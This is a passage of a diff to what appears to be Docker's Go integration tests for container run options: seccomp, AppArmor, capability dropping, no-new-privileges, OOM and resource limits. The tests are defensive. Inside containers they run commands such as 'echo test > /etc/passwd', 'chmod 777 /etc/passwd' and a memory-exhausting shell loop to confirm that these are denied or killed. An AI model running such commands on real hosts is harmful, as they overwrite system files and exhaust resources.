"--cpu-shares", "1000", "-m", "32m", "busybox", "echo", "test") - c.Assert(out, checker.Equals, "test\n", check.Commentf("container should've printed 'test'")) + cli.DockerCmd(c, "run", "--cpu-shares", "1000", "-m", "32m", "busybox", "echo", "test").Assert(c, icmd.Expected{ + Out: "test\n", + }) } func (s *DockerSuite) TestRunWithCpusetCpus(c *check.C) { @@ -607,11 +615,12 @@ func (s *DockerSuite) TestRunWithInvalidPathforBlkioDeviceWriteIOps(c *check.C) } func (s *DockerSuite) TestRunOOMExitCode(c *check.C) { - testRequires(c, memoryLimitSupport, swapMemorySupport) + testRequires(c, memoryLimitSupport, swapMemorySupport, NotPpc64le) errChan := make(chan error) go func() { defer close(errChan) - out, exitCode, _ := dockerCmdWithError("run", "-m", "4MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done") + // memory limit lower than 8MB will raise an error of "device or resource busy" from docker-runc. + out, exitCode, _ := dockerCmdWithError("run", "-m", "8MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done") if expected := 137; exitCode != expected { errChan <- fmt.Errorf("wrong exit code for OOM container: expected %d, got %d (output: %q)", expected, exitCode, out) } @@ -629,11 +638,12 @@ func (s *DockerSuite) TestRunWithMemoryLimit(c *check.C) { testRequires(c, memoryLimitSupport) file := "/sys/fs/cgroup/memory/memory.limit_in_bytes" - stdout, _, _ := dockerCmdWithStdoutStderr(c, "run", "-m", "32M", "--name", "test", "busybox", "cat", file) - c.Assert(strings.TrimSpace(stdout), checker.Equals, "33554432") - - out := inspectField(c, "test", "HostConfig.Memory") - c.Assert(out, check.Equals, "33554432") + cli.DockerCmd(c, "run", "-m", "32M", "--name", "test", "busybox", "cat", file).Assert(c, icmd.Expected{ + Out: "33554432", + }) + cli.InspectCmd(c, "test", cli.Format(".HostConfig.Memory")).Assert(c, icmd.Expected{ + Out: "33554432", + }) } // TestRunWithoutMemoryswapLimit sets memory limit and disables swap @@ -670,7 +680,7 @@ func (s 
*DockerSuite) TestRunWithSwappinessInvalid(c *check.C) { } func (s *DockerSuite) TestRunWithMemoryReservation(c *check.C) { - testRequires(c, memoryReservationSupport) + testRequires(c, SameHostDaemon, memoryReservationSupport) file := "/sys/fs/cgroup/memory/memory.soft_limit_in_bytes" out, _ := dockerCmd(c, "run", "--memory-reservation", "200M", "--name", "test", "busybox", "cat", file) @@ -682,7 +692,7 @@ func (s *DockerSuite) TestRunWithMemoryReservation(c *check.C) { func (s *DockerSuite) TestRunWithMemoryReservationInvalid(c *check.C) { testRequires(c, memoryLimitSupport) - testRequires(c, memoryReservationSupport) + testRequires(c, SameHostDaemon, memoryReservationSupport) out, _, err := dockerCmdWithError("run", "-m", "500M", "--memory-reservation", "800M", "busybox", "true") c.Assert(err, check.NotNil) expected := "Minimum memory limit can not be less than memory reservation limit" @@ -829,17 +839,11 @@ func (s *DockerSuite) TestRunTmpfsMounts(c *check.C) { func (s *DockerSuite) TestRunTmpfsMountsOverrideImageVolumes(c *check.C) { name := "img-with-volumes" - _, err := buildImage( - name, - ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM busybox VOLUME /run RUN touch /run/stuff - `, - true) - if err != nil { - c.Fatal(err) - } + `)) out, _ := dockerCmd(c, "run", "--tmpfs", "/run", name, "ls", "/run") c.Assert(out, checker.Not(checker.Contains), "stuff") } @@ -886,7 +890,6 @@ func (s *DockerSuite) TestRunTmpfsMountsWithOptions(c *check.C) { } func (s *DockerSuite) TestRunSysctls(c *check.C) { - testRequires(c, DaemonIsLinux) var err error @@ -909,11 +912,11 @@ func (s *DockerSuite) TestRunSysctls(c *check.C) { c.Assert(err, check.IsNil) c.Assert(sysctls["net.ipv4.ip_forward"], check.Equals, "0") - runCmd := exec.Command(dockerBinary, "run", "--sysctl", "kernel.foobar=1", "--name", "test2", "busybox", "cat", "/proc/sys/kernel/foobar") - out, _, _ = runCommandWithOutput(runCmd) - if !strings.Contains(out, "invalid argument") { - 
c.Fatalf("expected --sysctl to fail, got %s", out) - } + icmd.RunCommand(dockerBinary, "run", "--sysctl", "kernel.foobar=1", "--name", "test2", + "busybox", "cat", "/proc/sys/kernel/foobar").Assert(c, icmd.Expected{ + ExitCode: 125, + Err: "invalid argument", + }) } // TestRunSeccompProfileDenyUnshare checks that 'docker run --security-opt seccomp=/tmp/profile.json debian:jessie unshare' exits with operation not permitted. @@ -937,11 +940,12 @@ func (s *DockerSuite) TestRunSeccompProfileDenyUnshare(c *check.C) { if _, err := tmpFile.Write([]byte(jsonData)); err != nil { c.Fatal(err) } - runCmd := exec.Command(dockerBinary, "run", "--security-opt", "apparmor=unconfined", "--security-opt", "seccomp="+tmpFile.Name(), "debian:jessie", "unshare", "-p", "-m", "-f", "-r", "mount", "-t", "proc", "none", "/proc") - out, _, _ := runCommandWithOutput(runCmd) - if !strings.Contains(out, "Operation not permitted") { - c.Fatalf("expected unshare with seccomp profile denied to fail, got %s", out) - } + icmd.RunCommand(dockerBinary, "run", "--security-opt", "apparmor=unconfined", + "--security-opt", "seccomp="+tmpFile.Name(), + "debian:jessie", "unshare", "-p", "-m", "-f", "-r", "mount", "-t", "proc", "none", "/proc").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) } // TestRunSeccompProfileDenyChmod checks that 'docker run --security-opt seccomp=/tmp/profile.json busybox chmod 400 /etc/hostname' exits with operation not permitted. 
@@ -971,15 +975,15 @@ func (s *DockerSuite) TestRunSeccompProfileDenyChmod(c *check.C) { if _, err := tmpFile.Write([]byte(jsonData)); err != nil { c.Fatal(err) } - runCmd := exec.Command(dockerBinary, "run", "--security-opt", "seccomp="+tmpFile.Name(), "busybox", "chmod", "400", "/etc/hostname") - out, _, _ := runCommandWithOutput(runCmd) - if !strings.Contains(out, "Operation not permitted") { - c.Fatalf("expected chmod with seccomp profile denied to fail, got %s", out) - } + icmd.RunCommand(dockerBinary, "run", "--security-opt", "seccomp="+tmpFile.Name(), + "busybox", "chmod", "400", "/etc/hostname").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) } // TestRunSeccompProfileDenyUnshareUserns checks that 'docker run debian:jessie unshare --map-root-user --user sh -c whoami' with a specific profile to -// deny unhare of a userns exits with operation not permitted. +// deny unshare of a userns exits with operation not permitted. func (s *DockerSuite) TestRunSeccompProfileDenyUnshareUserns(c *check.C) { testRequires(c, SameHostDaemon, seccompEnabled, NotArm, Apparmor) // from sched.h @@ -1008,11 +1012,12 @@ func (s *DockerSuite) TestRunSeccompProfileDenyUnshareUserns(c *check.C) { if _, err := tmpFile.Write([]byte(jsonData)); err != nil { c.Fatal(err) } - runCmd := exec.Command(dockerBinary, "run", "--security-opt", "apparmor=unconfined", "--security-opt", "seccomp="+tmpFile.Name(), "debian:jessie", "unshare", "--map-root-user", "--user", "sh", "-c", "whoami") - out, _, _ := runCommandWithOutput(runCmd) - if !strings.Contains(out, "Operation not permitted") { - c.Fatalf("expected unshare userns with seccomp profile denied to fail, got %s", out) - } + icmd.RunCommand(dockerBinary, "run", + "--security-opt", "apparmor=unconfined", "--security-opt", "seccomp="+tmpFile.Name(), + "debian:jessie", "unshare", "--map-root-user", "--user", "sh", "-c", "whoami").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) } // 
TestRunSeccompProfileDenyCloneUserns checks that 'docker run syscall-test' @@ -1021,11 +1026,10 @@ func (s *DockerSuite) TestRunSeccompProfileDenyCloneUserns(c *check.C) { testRequires(c, SameHostDaemon, seccompEnabled) ensureSyscallTest(c) - runCmd := exec.Command(dockerBinary, "run", "syscall-test", "userns-test", "id") - out, _, err := runCommandWithOutput(runCmd) - if err == nil || !strings.Contains(out, "clone failed: Operation not permitted") { - c.Fatalf("expected clone userns with default seccomp profile denied to fail, got %s: %v", out, err) - } + icmd.RunCommand(dockerBinary, "run", "syscall-test", "userns-test", "id").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "clone failed: Operation not permitted", + }) } // TestRunSeccompUnconfinedCloneUserns checks that @@ -1035,10 +1039,10 @@ func (s *DockerSuite) TestRunSeccompUnconfinedCloneUserns(c *check.C) { ensureSyscallTest(c) // make sure running w privileged is ok - runCmd := exec.Command(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "syscall-test", "userns-test", "id") - if out, _, err := runCommandWithOutput(runCmd); err != nil || !strings.Contains(out, "nobody") { - c.Fatalf("expected clone userns with --security-opt seccomp=unconfined to succeed, got %s: %v", out, err) - } + icmd.RunCommand(dockerBinary, "run", "--security-opt", "seccomp=unconfined", + "syscall-test", "userns-test", "id").Assert(c, icmd.Expected{ + Out: "nobody", + }) } // TestRunSeccompAllowPrivCloneUserns checks that 'docker run --privileged syscall-test' @@ -1048,10 +1052,9 @@ func (s *DockerSuite) TestRunSeccompAllowPrivCloneUserns(c *check.C) { ensureSyscallTest(c) // make sure running w privileged is ok - runCmd := exec.Command(dockerBinary, "run", "--privileged", "syscall-test", "userns-test", "id") - if out, _, err := runCommandWithOutput(runCmd); err != nil || !strings.Contains(out, "nobody") { - c.Fatalf("expected clone userns with --privileged to succeed, got %s: %v", out, err) - } + 
icmd.RunCommand(dockerBinary, "run", "--privileged", "syscall-test", "userns-test", "id").Assert(c, icmd.Expected{ + Out: "nobody", + }) } // TestRunSeccompProfileAllow32Bit checks that 32 bit code can run on x86_64 @@ -1060,10 +1063,7 @@ func (s *DockerSuite) TestRunSeccompProfileAllow32Bit(c *check.C) { testRequires(c, SameHostDaemon, seccompEnabled, IsAmd64) ensureSyscallTest(c) - runCmd := exec.Command(dockerBinary, "run", "syscall-test", "exit32-test", "id") - if out, _, err := runCommandWithOutput(runCmd); err != nil { - c.Fatalf("expected to be able to run 32 bit code, got %s: %v", out, err) - } + icmd.RunCommand(dockerBinary, "run", "syscall-test", "exit32-test").Assert(c, icmd.Success) } // TestRunSeccompAllowSetrlimit checks that 'docker run debian:jessie ulimit -v 1048510' succeeds. @@ -1071,10 +1071,7 @@ func (s *DockerSuite) TestRunSeccompAllowSetrlimit(c *check.C) { testRequires(c, SameHostDaemon, seccompEnabled) // ulimit uses setrlimit, so we want to make sure we don't break it - runCmd := exec.Command(dockerBinary, "run", "debian:jessie", "bash", "-c", "ulimit -v 1048510") - if out, _, err := runCommandWithOutput(runCmd); err != nil { - c.Fatalf("expected ulimit with seccomp to succeed, got %s: %v", out, err) - } + icmd.RunCommand(dockerBinary, "run", "debian:jessie", "bash", "-c", "ulimit -v 1048510").Assert(c, icmd.Success) } func (s *DockerSuite) TestRunSeccompDefaultProfileAcct(c *check.C) { @@ -1142,193 +1139,188 @@ func (s *DockerSuite) TestRunSeccompDefaultProfileNS(c *check.C) { } } -// TestRunNoNewPrivSetuid checks that --security-opt=no-new-privileges prevents +// TestRunNoNewPrivSetuid checks that --security-opt='no-new-privileges=true' prevents // effective uid transtions on executing setuid binaries. 
func (s *DockerSuite) TestRunNoNewPrivSetuid(c *check.C) { testRequires(c, DaemonIsLinux, NotUserNamespace, SameHostDaemon) ensureNNPTest(c) // test that running a setuid binary results in no effective uid transition - runCmd := exec.Command(dockerBinary, "run", "--security-opt", "no-new-privileges", "--user", "1000", "nnp-test", "/usr/bin/nnp-test") - if out, _, err := runCommandWithOutput(runCmd); err != nil || !strings.Contains(out, "EUID=1000") { - c.Fatalf("expected output to contain EUID=1000, got %s: %v", out, err) - } + icmd.RunCommand(dockerBinary, "run", "--security-opt", "no-new-privileges=true", "--user", "1000", + "nnp-test", "/usr/bin/nnp-test").Assert(c, icmd.Expected{ + Out: "EUID=1000", + }) +} + +// TestLegacyRunNoNewPrivSetuid checks that --security-opt=no-new-privileges prevents +// effective uid transtions on executing setuid binaries. +func (s *DockerSuite) TestLegacyRunNoNewPrivSetuid(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, SameHostDaemon) + ensureNNPTest(c) + + // test that running a setuid binary results in no effective uid transition + icmd.RunCommand(dockerBinary, "run", "--security-opt", "no-new-privileges", "--user", "1000", + "nnp-test", "/usr/bin/nnp-test").Assert(c, icmd.Expected{ + Out: "EUID=1000", + }) } func (s *DockerSuite) TestUserNoEffectiveCapabilitiesChown(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) ensureSyscallTest(c) // test that a root user has default capability CAP_CHOWN - runCmd := exec.Command(dockerBinary, "run", "busybox", "chown", "100", "/tmp") - _, _, err := runCommandWithOutput(runCmd) - c.Assert(err, check.IsNil) + dockerCmd(c, "run", "busybox", "chown", "100", "/tmp") // test that non root user does not have default capability CAP_CHOWN - runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "chown", "100", "/tmp") - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, 
check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "busybox", "chown", "100", "/tmp").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) // test that root user can drop default capability CAP_CHOWN - runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "chown", "busybox", "chown", "100", "/tmp") - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--cap-drop", "chown", "busybox", "chown", "100", "/tmp").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) } func (s *DockerSuite) TestUserNoEffectiveCapabilitiesDacOverride(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) ensureSyscallTest(c) // test that a root user has default capability CAP_DAC_OVERRIDE - runCmd := exec.Command(dockerBinary, "run", "busybox", "sh", "-c", "echo test > /etc/passwd") - _, _, err := runCommandWithOutput(runCmd) - c.Assert(err, check.IsNil) + dockerCmd(c, "run", "busybox", "sh", "-c", "echo test > /etc/passwd") // test that non root user does not have default capability CAP_DAC_OVERRIDE - runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "sh", "-c", "echo test > /etc/passwd") - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Permission denied") - // TODO test that root user can drop default capability CAP_DAC_OVERRIDE + icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "busybox", "sh", "-c", "echo test > /etc/passwd").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Permission denied", + }) } func (s *DockerSuite) TestUserNoEffectiveCapabilitiesFowner(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, 
SameHostDaemon) ensureSyscallTest(c) // test that a root user has default capability CAP_FOWNER - runCmd := exec.Command(dockerBinary, "run", "busybox", "chmod", "777", "/etc/passwd") - _, _, err := runCommandWithOutput(runCmd) - c.Assert(err, check.IsNil) + dockerCmd(c, "run", "busybox", "chmod", "777", "/etc/passwd") // test that non root user does not have default capability CAP_FOWNER - runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "chmod", "777", "/etc/passwd") - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "busybox", "chmod", "777", "/etc/passwd").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) // TODO test that root user can drop default capability CAP_FOWNER } // TODO CAP_KILL func (s *DockerSuite) TestUserNoEffectiveCapabilitiesSetuid(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) ensureSyscallTest(c) // test that a root user has default capability CAP_SETUID - runCmd := exec.Command(dockerBinary, "run", "syscall-test", "setuid-test") - _, _, err := runCommandWithOutput(runCmd) - c.Assert(err, check.IsNil) + dockerCmd(c, "run", "syscall-test", "setuid-test") // test that non root user does not have default capability CAP_SETUID - runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "setuid-test") - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "setuid-test").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) // test that root user can drop default capability CAP_SETUID - runCmd = exec.Command(dockerBinary, "run", "--cap-drop", 
"setuid", "syscall-test", "setuid-test") - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--cap-drop", "setuid", "syscall-test", "setuid-test").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) } func (s *DockerSuite) TestUserNoEffectiveCapabilitiesSetgid(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) ensureSyscallTest(c) // test that a root user has default capability CAP_SETGID - runCmd := exec.Command(dockerBinary, "run", "syscall-test", "setgid-test") - _, _, err := runCommandWithOutput(runCmd) - c.Assert(err, check.IsNil) + dockerCmd(c, "run", "syscall-test", "setgid-test") // test that non root user does not have default capability CAP_SETGID - runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "setgid-test") - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "setgid-test").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) // test that root user can drop default capability CAP_SETGID - runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "setgid", "syscall-test", "setgid-test") - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--cap-drop", "setgid", "syscall-test", "setgid-test").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) } // TODO CAP_SETPCAP func (s *DockerSuite) TestUserNoEffectiveCapabilitiesNetBindService(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) 
ensureSyscallTest(c) // test that a root user has default capability CAP_NET_BIND_SERVICE - runCmd := exec.Command(dockerBinary, "run", "syscall-test", "socket-test") - _, _, err := runCommandWithOutput(runCmd) - c.Assert(err, check.IsNil) + dockerCmd(c, "run", "syscall-test", "socket-test") // test that non root user does not have default capability CAP_NET_BIND_SERVICE - runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "socket-test") - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Permission denied") + icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "socket-test").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Permission denied", + }) // test that root user can drop default capability CAP_NET_BIND_SERVICE - runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "net_bind_service", "syscall-test", "socket-test") - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Permission denied") + icmd.RunCommand(dockerBinary, "run", "--cap-drop", "net_bind_service", "syscall-test", "socket-test").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Permission denied", + }) } func (s *DockerSuite) TestUserNoEffectiveCapabilitiesNetRaw(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) ensureSyscallTest(c) // test that a root user has default capability CAP_NET_RAW - runCmd := exec.Command(dockerBinary, "run", "syscall-test", "raw-test") - _, _, err := runCommandWithOutput(runCmd) - c.Assert(err, check.IsNil) + dockerCmd(c, "run", "syscall-test", "raw-test") // test that non root user does not have default capability CAP_NET_RAW - runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "raw-test") - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, 
check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "raw-test").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) // test that root user can drop default capability CAP_NET_RAW - runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "net_raw", "syscall-test", "raw-test") - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--cap-drop", "net_raw", "syscall-test", "raw-test").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) } func (s *DockerSuite) TestUserNoEffectiveCapabilitiesChroot(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) ensureSyscallTest(c) // test that a root user has default capability CAP_SYS_CHROOT - runCmd := exec.Command(dockerBinary, "run", "busybox", "chroot", "/", "/bin/true") - _, _, err := runCommandWithOutput(runCmd) - c.Assert(err, check.IsNil) + dockerCmd(c, "run", "busybox", "chroot", "/", "/bin/true") // test that non root user does not have default capability CAP_SYS_CHROOT - runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "chroot", "/", "/bin/true") - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "busybox", "chroot", "/", "/bin/true").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) // test that root user can drop default capability CAP_SYS_CHROOT - runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "sys_chroot", "busybox", "chroot", "/", "/bin/true") - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, 
check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--cap-drop", "sys_chroot", "busybox", "chroot", "/", "/bin/true").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) } func (s *DockerSuite) TestUserNoEffectiveCapabilitiesMknod(c *check.C) { - testRequires(c, DaemonIsLinux, NotUserNamespace) + testRequires(c, DaemonIsLinux, NotUserNamespace, SameHostDaemon) ensureSyscallTest(c) // test that a root user has default capability CAP_MKNOD - runCmd := exec.Command(dockerBinary, "run", "busybox", "mknod", "/tmp/node", "b", "1", "2") - _, _, err := runCommandWithOutput(runCmd) - c.Assert(err, check.IsNil) + dockerCmd(c, "run", "busybox", "mknod", "/tmp/node", "b", "1", "2") // test that non root user does not have default capability CAP_MKNOD - runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "mknod", "/tmp/node", "b", "1", "2") - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + // test that root user can drop default capability CAP_SYS_CHROOT + icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "busybox", "mknod", "/tmp/node", "b", "1", "2").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) // test that root user can drop default capability CAP_MKNOD - runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "mknod", "busybox", "mknod", "/tmp/node", "b", "1", "2") - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--cap-drop", "mknod", "busybox", "mknod", "/tmp/node", "b", "1", "2").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) } // TODO CAP_AUDIT_WRITE @@ -1338,14 +1330,16 @@ func (s *DockerSuite) 
TestRunApparmorProcDirectory(c *check.C) { testRequires(c, SameHostDaemon, Apparmor) // running w seccomp unconfined tests the apparmor profile - runCmd := exec.Command(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "busybox", "chmod", "777", "/proc/1/cgroup") - if out, _, err := runCommandWithOutput(runCmd); err == nil || !(strings.Contains(out, "Permission denied") || strings.Contains(out, "Operation not permitted")) { - c.Fatalf("expected chmod 777 /proc/1/cgroup to fail, got %s: %v", out, err) + result := icmd.RunCommand(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "busybox", "chmod", "777", "/proc/1/cgroup") + result.Assert(c, icmd.Expected{ExitCode: 1}) + if !(strings.Contains(result.Combined(), "Permission denied") || strings.Contains(result.Combined(), "Operation not permitted")) { + c.Fatalf("expected chmod 777 /proc/1/cgroup to fail, got %s: %v", result.Combined(), result.Error) } - runCmd = exec.Command(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "busybox", "chmod", "777", "/proc/1/attr/current") - if out, _, err := runCommandWithOutput(runCmd); err == nil || !(strings.Contains(out, "Permission denied") || strings.Contains(out, "Operation not permitted")) { - c.Fatalf("expected chmod 777 /proc/1/attr/current to fail, got %s: %v", out, err) + result = icmd.RunCommand(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "busybox", "chmod", "777", "/proc/1/attr/current") + result.Assert(c, icmd.Expected{ExitCode: 1}) + if !(strings.Contains(result.Combined(), "Permission denied") || strings.Contains(result.Combined(), "Operation not permitted")) { + c.Fatalf("expected chmod 777 /proc/1/attr/current to fail, got %s: %v", result.Combined(), result.Error) } } @@ -1410,7 +1404,7 @@ func (s *DockerSuite) TestRunDeviceSymlink(c *check.C) { // TestRunPIDsLimit makes sure the pids cgroup is set with --pids-limit func (s *DockerSuite) TestRunPIDsLimit(c *check.C) { - testRequires(c, pidsLimit) + testRequires(c, 
SameHostDaemon, pidsLimit) file := "/sys/fs/cgroup/pids/pids.max" out, _ := dockerCmd(c, "run", "--name", "skittles", "--pids-limit", "4", "busybox", "cat", file) @@ -1449,8 +1443,7 @@ func (s *DockerSuite) TestRunUserDeviceAllowed(c *check.C) { func (s *DockerDaemonSuite) TestRunSeccompJSONNewFormat(c *check.C) { testRequires(c, SameHostDaemon, seccompEnabled) - err := s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c) jsonData := `{ "defaultAction": "SCMP_ACT_ALLOW", @@ -1475,8 +1468,7 @@ func (s *DockerDaemonSuite) TestRunSeccompJSONNewFormat(c *check.C) { func (s *DockerDaemonSuite) TestRunSeccompJSONNoNameAndNames(c *check.C) { testRequires(c, SameHostDaemon, seccompEnabled) - err := s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c) jsonData := `{ "defaultAction": "SCMP_ACT_ALLOW", @@ -1502,8 +1494,7 @@ func (s *DockerDaemonSuite) TestRunSeccompJSONNoNameAndNames(c *check.C) { func (s *DockerDaemonSuite) TestRunSeccompJSONNoArchAndArchMap(c *check.C) { testRequires(c, SameHostDaemon, seccompEnabled) - err := s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c) jsonData := `{ "archMap": [ @@ -1540,11 +1531,10 @@ func (s *DockerDaemonSuite) TestRunSeccompJSONNoArchAndArchMap(c *check.C) { func (s *DockerDaemonSuite) TestRunWithDaemonDefaultSeccompProfile(c *check.C) { testRequires(c, SameHostDaemon, seccompEnabled) - err := s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c) // 1) verify I can run containers with the Docker default shipped profile which allows chmod - _, err = s.d.Cmd("run", "busybox", "chmod", "777", ".") + _, err := s.d.Cmd("run", "busybox", "chmod", "777", ".") c.Assert(err, check.IsNil) jsonData := `{ @@ -1563,8 +1553,7 @@ func (s *DockerDaemonSuite) TestRunWithDaemonDefaultSeccompProfile(c *check.C) { c.Assert(err, check.IsNil) // 2) restart the daemon and add a custom seccomp profile in which we deny chmod - err = 
s.d.Restart("--seccomp-profile=" + tmpFile.Name()) - c.Assert(err, check.IsNil) + s.d.Restart(c, "--seccomp-profile="+tmpFile.Name()) out, err := s.d.Cmd("run", "busybox", "chmod", "777", ".") c.Assert(err, check.NotNil) @@ -1579,14 +1568,18 @@ func (s *DockerSuite) TestRunWithNanoCPUs(c *check.C) { out, _ := dockerCmd(c, "run", "--cpus", "0.5", "--name", "test", "busybox", "sh", "-c", fmt.Sprintf("cat %s && cat %s", file1, file2)) c.Assert(strings.TrimSpace(out), checker.Equals, "50000\n100000") - out = inspectField(c, "test", "HostConfig.NanoCpus") - c.Assert(out, checker.Equals, "5e+08", check.Commentf("setting the Nano CPUs failed")) + clt, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + inspect, err := clt.ContainerInspect(context.Background(), "test") + c.Assert(err, checker.IsNil) + c.Assert(inspect.HostConfig.NanoCPUs, checker.Equals, int64(500000000)) + out = inspectField(c, "test", "HostConfig.CpuQuota") c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS quota should be 0")) out = inspectField(c, "test", "HostConfig.CpuPeriod") c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS period should be 0")) - out, _, err := dockerCmdWithError("run", "--cpus", "0.5", "--cpu-quota", "50000", "--cpu-period", "100000", "busybox", "sh") + out, _, err = dockerCmdWithError("run", "--cpus", "0.5", "--cpu-quota", "50000", "--cpu-period", "100000", "busybox", "sh") c.Assert(err, check.NotNil) c.Assert(out, checker.Contains, "Conflicting options: Nano CPUs and CPU Period cannot both be set") } diff --git 